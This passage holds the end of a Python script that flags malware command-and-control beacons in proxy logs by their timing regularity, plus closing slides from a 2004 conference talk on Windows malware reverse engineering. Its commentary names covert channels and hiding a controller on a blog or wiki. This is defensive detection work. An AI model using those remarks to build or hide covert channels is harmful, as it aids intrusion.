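            findings.append({"client": client, "host": host, "path": path,
                             "period_s": round(mean, 1), "jitter_cv": round(cv, 3),
                             "posts_to_host": posts[(client, host)]})
    return findings


if __name__ == "__main__":
    for f in find_beacons(parse(SAMPLE_LOG)):
        print("beacon: %(client)s -> %(host)s%(path)s every %(period_s)ss "
              "(cv %(jitter_cv)s, %(posts_to_host)d POSTs)" % f)
```

Two caveats from the slides apply. Slide 15 lists other channels (mail, DNS, ping, FTP), so the same periodicity check should be run over those logs too rather than only the web proxy. And a controller on a blog or wiki (also slide 15) makes the destination host look legitimate, which is why the check keys on regularity of timing rather than on reputation of the host.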
18. Scan of the Month
  • Goal:
    – Improve the Windows reverse engineering malware state of the art
  • Honeynet Project:
    – http://www.honeynet.org/scans/

19. That's all folks
  • Thank you!
  • Any questions?
  FIST Conference Octubre/Madrid 2004

20. Attribution-NonCommercial-NoDerivs 2.0
  You are free: to copy, distribute, display, and perform the work.
  Under the following conditions:
  • Attribution. You must give the original author credit.
  • Noncommercial. You may not use this work for commercial purposes.
  • No Derivative Works. You may not alter, transform, or build upon this work.
  For any reuse or distribution, you must make clear to others the license terms of this work. Any of these conditions can be waived if you get permission from the author. Your fair use and other rights are in no way affected by the above.
  This is a human-readable summary of http://creativecommons.org/licenses/by-nc-nd/2.0/.